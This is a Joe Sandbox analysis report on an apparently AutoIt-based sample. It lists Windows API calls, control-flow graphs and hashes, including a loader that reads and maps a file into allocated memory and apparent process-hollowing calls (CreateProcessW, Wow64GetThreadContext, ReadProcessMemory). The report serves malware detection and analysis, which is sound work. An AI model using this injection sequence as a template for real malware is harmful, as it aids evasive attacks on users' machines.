                                                • Part of subcall function 00D72CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72D42
                                                • Part of subcall function 00D72CD4: LoadIconW.USER32(000000A9), ref: 00D72D85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 2880975755-4155596026
                                              • Opcode ID: d7e8a06c67ade80346e7b79011941f26b767544965d78164773e22b7e0ac441d
                                              • Instruction ID: 518c6625a526e1a8d88633778676087ca685eb8da1ab518b404a87e6cd83b614
                                              • Opcode Fuzzy Hash: d7e8a06c67ade80346e7b79011941f26b767544965d78164773e22b7e0ac441d
                                              • Instruction Fuzzy Hash: 99216A78E40314AFCF109FA7EC45BA97FB4FB49B40F16009AE500B66A0D3B1058ACF90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                              • API String ID: 0-2799515523
                                              • Opcode ID: 520a015f3f8f2d8a93adb6bf469f206b193bfc1e8f56026e512323f591ca6aac
                                              • Instruction ID: d1657301476d3c31c7fc87d62cee6e8165490ed67e1839b715f3c94961c543b3
                                              • Opcode Fuzzy Hash: 520a015f3f8f2d8a93adb6bf469f206b193bfc1e8f56026e512323f591ca6aac
                                              • Instruction Fuzzy Hash: 2FC26A75A00215CFCB24DF58C881AADB7B1FF09304F2885A9E959AB391E375ED41CBB1

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00D72D07
                                              • RegisterClassExW.USER32(00000030), ref: 00D72D31
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72D42
                                              • LoadIconW.USER32(000000A9), ref: 00D72D85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 975902462-1005189915
                                              • Opcode ID: 467a55330b056b5ade76895091f37da60a63c39a35e0835ebba4909e4e1a92f0
                                              • Instruction ID: 30e0d99a3a4f77251cfb8833333ba867be97116e6878fde7a3e8c9b977c07b62
                                              • Opcode Fuzzy Hash: 467a55330b056b5ade76895091f37da60a63c39a35e0835ebba4909e4e1a92f0
                                              • Instruction Fuzzy Hash: 1221E3B5901308AFDF00DFA6E849BDDBBB4FB49700F10825AF611B62A0D7B10589CF90

                                              Control-flow Graph
                                              control_flow_graph 1012 da8d45-da8d55 1013 da8d6f-da8d71 1012->1013 1014 da8d57-da8d6a call d9f2c6 call d9f2d9 1012->1014 1016 da90d9-da90e6 call d9f2c6 call d9f2d9 1013->1016 1017 da8d77-da8d7d 1013->1017 1030 da90f1 1014->1030 1035 da90ec call da27ec 1016->1035 1017->1016 1020 da8d83-da8dae 1017->1020 1020->1016 1023 da8db4-da8dbd 1020->1023 1026 da8dbf-da8dd2 call d9f2c6 call d9f2d9 1023->1026 1027 da8dd7-da8dd9 1023->1027 1026->1035 1028 da8ddf-da8de3 1027->1028 1029 da90d5-da90d7 1027->1029 1028->1029 1033 da8de9-da8ded 1028->1033 1034 da90f4-da90f9 1029->1034 1030->1034 1033->1026 1037 da8def-da8e06 1033->1037 1035->1030 1040 da8e08-da8e0b 1037->1040 1041 da8e23-da8e2c 1037->1041 1043 da8e0d-da8e13 1040->1043 1044 da8e15-da8e1e 1040->1044 1045 da8e4a-da8e54 1041->1045 1046 da8e2e-da8e45 call d9f2c6 call d9f2d9 call da27ec 1041->1046 1043->1044 1043->1046 1049 da8ebf-da8ed9 1044->1049 1047 da8e5b-da8e79 call da3820 call da29c8 * 2 1045->1047 1048 da8e56-da8e58 1045->1048 1078 da900c 1046->1078 1082 da8e7b-da8e91 call d9f2d9 call d9f2c6 1047->1082 1083 da8e96-da8ebc call da9424 1047->1083 1048->1047 1051 da8edf-da8eef 1049->1051 1052 da8fad-da8fb6 call daf89b 1049->1052 1051->1052 1055 da8ef5-da8ef7 1051->1055 1065 da8fb8-da8fca 1052->1065 1066 da9029 1052->1066 1055->1052 1059 da8efd-da8f23 1055->1059 1059->1052 1063 da8f29-da8f3c 1059->1063 1063->1052 1068 da8f3e-da8f40 1063->1068 1065->1066 1071 da8fcc-da8fdb GetConsoleMode 1065->1071 1070 da902d-da9045 ReadFile 1066->1070 1068->1052 1073 da8f42-da8f6d 1068->1073 1075 da90a1-da90ac GetLastError 1070->1075 1076 da9047-da904d 1070->1076 1071->1066 1077 da8fdd-da8fe1 1071->1077 1073->1052 1081 da8f6f-da8f82 1073->1081 1084 da90ae-da90c0 call d9f2d9 call d9f2c6 1075->1084 1085 da90c5-da90c8 1075->1085 1076->1075 1086 da904f 1076->1086 1077->1070 1079 da8fe3-da8ffd ReadConsoleW 1077->1079 1080 da900f-da9019 call da29c8 1078->1080 1087 da901e-da9027 1079->1087 1088 da8fff GetLastError 1079->1088 1080->1034 1081->1052 1092 da8f84-da8f86 1081->1092 1082->1078 1083->1049 1084->1078 1089 da90ce-da90d0 1085->1089 1090 da9005-da900b call d9f2a3 1085->1090 1096 da9052-da9064 1086->1096 1087->1096 1088->1090 1089->1080 1090->1078 1092->1052 1099 da8f88-da8fa8 1092->1099 1096->1080 1103 da9066-da906a 1096->1103 1099->1052 1104 da906c-da907c call da8a61 1103->1104 1105 da9083-da908e 1103->1105 1117 da907f-da9081 1104->1117 1111 da909a-da909f call da88a1 1105->1111 1112 da9090 call da8bb1 1105->1112 1118 da9095-da9098 1111->1118 1112->1118 1117->1080 1118->1117
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74fc6ddbf8d3d99d4f9c9c5bca4c41c4e41fc345de36f03a747899d5fce38848
                                              • Instruction ID: 4155228e6fca55b796afc2ca21663f9dd609e1174b1007ed670170bafc905512
                                              • Opcode Fuzzy Hash: 74fc6ddbf8d3d99d4f9c9c5bca4c41c4e41fc345de36f03a747899d5fce38848
                                              • Instruction Fuzzy Hash: 7CC1F074A04249AFCF11EFA9C851BADBBB0AF0B310F1841A9F954E7392C7318942CB75

                                              Control-flow Graph
                                              control_flow_graph 1120 1043830-10438de call 1041270 1123 10438e5-104390b call 1044740 CreateFileW 1120->1123 1126 1043912-1043922 1123->1126 1127 104390d 1123->1127 1132 1043924 1126->1132 1133 1043929-1043943 VirtualAlloc 1126->1133 1128 1043a5d-1043a61 1127->1128 1130 1043aa3-1043aa6 1128->1130 1131 1043a63-1043a67 1128->1131 1134 1043aa9-1043ab0 1130->1134 1135 1043a73-1043a77 1131->1135 1136 1043a69-1043a6c 1131->1136 1132->1128 1139 1043945 1133->1139 1140 104394a-1043961 ReadFile 1133->1140 1141 1043b05-1043b1a 1134->1141 1142 1043ab2-1043abd 1134->1142 1137 1043a87-1043a8b 1135->1137 1138 1043a79-1043a83 1135->1138 1136->1135 1145 1043a8d-1043a97 1137->1145 1146 1043a9b 1137->1146 1138->1137 1139->1128 1147 1043963 1140->1147 1148 1043968-10439a8 VirtualAlloc 1140->1148 1143 1043b1c-1043b27 VirtualFree 1141->1143 1144 1043b2a-1043b32 1141->1144 1149 1043ac1-1043acd 1142->1149 1150 1043abf 1142->1150 1143->1144 1145->1146 1146->1130 1147->1128 1151 10439af-10439ca call 1044990 1148->1151 1152 10439aa 1148->1152 1153 1043ae1-1043aed 1149->1153 1154 1043acf-1043adf 1149->1154 1150->1141 1160 10439d5-10439df 1151->1160 1152->1128 1155 1043aef-1043af8 1153->1155 1156 1043afa-1043b00 1153->1156 1158 1043b03 1154->1158 1155->1158 1156->1158 1158->1134 1161 10439e1-1043a10 call 1044990 1160->1161 1162 1043a12-1043a26 call 10447a0 1160->1162 1161->1160 1168 1043a28 1162->1168 1169 1043a2a-1043a2e 1162->1169 1168->1128 1170 1043a30-1043a34 CloseHandle 1169->1170 1171 1043a3a-1043a3e 1169->1171 1170->1171 1172 1043a40-1043a4b VirtualFree 1171->1172 1173 1043a4e-1043a57 1171->1173 1172->1173 1173->1123 1173->1128
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01043901
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01043B27
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFileFreeVirtual
                                              • String ID:
                                              • API String ID: 204039940-0
                                              • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                              • Instruction ID: 29a5c61838a212b92c8fc01c4e65ba307ef0a71adfeb6aa6a49ce77f139ad7ba
                                              • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                              • Instruction Fuzzy Hash: 3DA129B4E40219EBDB14CFA4C894BEEBBB5BF48304F1091A9E255BB280D7759A41CF94

                                              Control-flow Graph
                                              control_flow_graph 1184 d72c63-d72cd3 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D72C91
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D72CB2
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D71CAD,?), ref: 00D72CC6
                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D71CAD,?), ref: 00D72CCF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 4d482c1aa9e933b9ad3a558084f27662fd9b188592531b0fcd4ad00ed0a08e73
                                              • Instruction ID: e92ef892e28111665a0be85f6e7bdf5c8a88ddeeb176bfe67a534e6466854c85
                                              • Opcode Fuzzy Hash: 4d482c1aa9e933b9ad3a558084f27662fd9b188592531b0fcd4ad00ed0a08e73
                                              • Instruction Fuzzy Hash: 80F0DA799402907EEB311B27AC49E7B2EBDD7C7F50B16109AF900B25A0C671189ADAB0

                                              Control-flow Graph

                                              Control-flow graph, function 1043620-10437e9: CreateFileW, VirtualAlloc, ReadFile, ExitProcess, plus internal calls (1041270, 1043510, 1043550, 1042510, 10435a0)
                                              APIs
                                                • Part of subcall function 01043510: Sleep.KERNELBASE(000001F4), ref: 01043521
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01043723
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: 3ZCE7KQQ5Q00S
                                              • API String ID: 2694422964-995754217
                                              • Opcode ID: 348da9c1924058288485560fc1bf8dfeffd8931f534e33340d94dbb639168fb5
                                              • Instruction ID: c104a5d3ce8abe4e2636ec54c082f0edd4d10040e43bcaefdf0a1cd5e1f8e5f5
                                              • Opcode Fuzzy Hash: 348da9c1924058288485560fc1bf8dfeffd8931f534e33340d94dbb639168fb5
                                              • Instruction Fuzzy Hash: DF519270D04259DBEF21DBA4C855BEFBBB8AF04300F1041A9E648BB2C0D7795B45CBA5

                                              Control-flow Graph

                                              Control-flow graph, function de2947-de2cf6: DeleteFileW * 4, CopyFileW, plus internal calls (db1f50, de25d6, d8fe0b, d75722, de274e, d7511f, d95232, de2e66, d9d583, d94983, d99038, d750f5, de3017, d9e5eb, de2792, d9e678, de211d, d9dbb3, d9d2eb, de22ce, de2fd8, de28d2, d8fdcd, d8fe14)
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2C05
                                              • DeleteFileW.KERNEL32(?), ref: 00DE2C87
                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2C9D
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2CAE
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2CC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: File$Delete$Copy
                                              • String ID:
                                              • API String ID: 3226157194-0
                                              • Opcode ID: e8c8a397bceabb62532d3b1aba80129dac53ba2c746ec2ebdcff280ed64c9638
                                              • Instruction ID: 9bccb8110f97812e6cdb1a6cd843c9a502cc89c1dcf2333848db030af6320dd9
                                              • Opcode Fuzzy Hash: e8c8a397bceabb62532d3b1aba80129dac53ba2c746ec2ebdcff280ed64c9638
                                              • Instruction Fuzzy Hash: B5B15D72D00119ABDF21EBA5CC85EEEBBBDEF48350F1040A6F609E6155EA319A448F71

                                              Control-flow Graph

                                              Control-flow graph, function eb7730-eb790a: LoadLibraryA, GetProcAddress, ExitProcess, VirtualProtect * 2
                                              APIs
                                              • LoadLibraryA.KERNEL32(?), ref: 00EB786A
                                              • GetProcAddress.KERNEL32(?,00EB0FF9), ref: 00EB7888
                                              • ExitProcess.KERNEL32(?,00EB0FF9), ref: 00EB7899
                                              • VirtualProtect.KERNELBASE(00D70000,00001000,00000004,?,00000000), ref: 00EB78E7
                                              • VirtualProtect.KERNELBASE(00D70000,00001000), ref: 00EB78FC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                              • String ID:
                                              • API String ID: 1996367037-0
                                              • Opcode ID: 1356178b0cf8e1fab21152d99001543fe609b5c1b2be5cccc37597f4e3506fc6
                                              • Instruction ID: dc1259974267892cd424821d034c6a548496f0b74c4779442a037ae5ed8e67ae
                                              • Opcode Fuzzy Hash: 1356178b0cf8e1fab21152d99001543fe609b5c1b2be5cccc37597f4e3506fc6
                                              • Instruction Fuzzy Hash: 60513872A4C2724BD7258EB8CCC46E27B91EB813257281779C5E2E7BC5EBA05805C7A0
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B40
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B61
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                              • Instruction ID: 316be0c03da355c77fba6dd17c26fb7517977b7dd9d15feadd2109b9d3ad2f46
                                              • Opcode Fuzzy Hash: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                              • Instruction Fuzzy Hash: BC112AB5510218FFDB208FA5DC44AEEB7BCEF04744B14855AA809E7110E2319E44A7A0
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01042CCB
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01042D61
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01042D83
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1797146074.0000000001041000.00000040.00000020.00020000.00000000.sdmp, Offset: 01041000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1041000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                              • Instruction ID: af377917bb008c28304093e25e8b34d12330a972dd93181f1af1561a6df5dd2b
                                              • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                              • Instruction Fuzzy Hash: 91621B70A142589BEB24CFA4D890BDEB772FF58300F1091A9E14DEB390E7759E81CB59
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DB33A2
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D73A04
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_wcslen
                                              • String ID: Line:
                                              • API String ID: 2289894680-1585850449
                                              • Opcode ID: 168111cb8558f5ce856846e8514b8d92280e49e2a3e1ab45f046f474808e5dd7
                                              • Instruction ID: 2071971abb97fd7963bbaf411331fce2c5e38de7cff3a1d4a86a0cf6a1b2d6c9
                                              • Opcode Fuzzy Hash: 168111cb8558f5ce856846e8514b8d92280e49e2a3e1ab45f046f474808e5dd7
                                              • Instruction Fuzzy Hash: 2031A271408310AEC721EF24DC46BEBB7E8EB81710F14856AF59D92191FB709689DBF2
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90668
                                                • Part of subcall function 00D932A4: RaiseException.KERNEL32(?,?,?,00D9068A,?,00E41444,?,?,?,?,?,?,00D9068A,00D71129,00E38738,00D71129), ref: 00D93304
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90685
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$ExceptionRaise
                                              • String ID: Unknown exception
                                              • API String ID: 3476068407-410509341
                                              • Opcode ID: c5a18eb9aa05ed8692aa790305cba081ffb612d21626b8fff6b87e5d690b5b3b
                                              • Instruction ID: 5497b59335666f923ae1beb77d94432b6e3b9e027a3d678398d8791308ca0f04
                                              • Opcode Fuzzy Hash: c5a18eb9aa05ed8692aa790305cba081ffb612d21626b8fff6b87e5d690b5b3b
                                              • Instruction Fuzzy Hash: A5F04F24900309BB8F00B7A4E84AD9E7B6C9E40350B644531B924D65D2EF71EA66C6B0
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DE302F
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DE3044
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
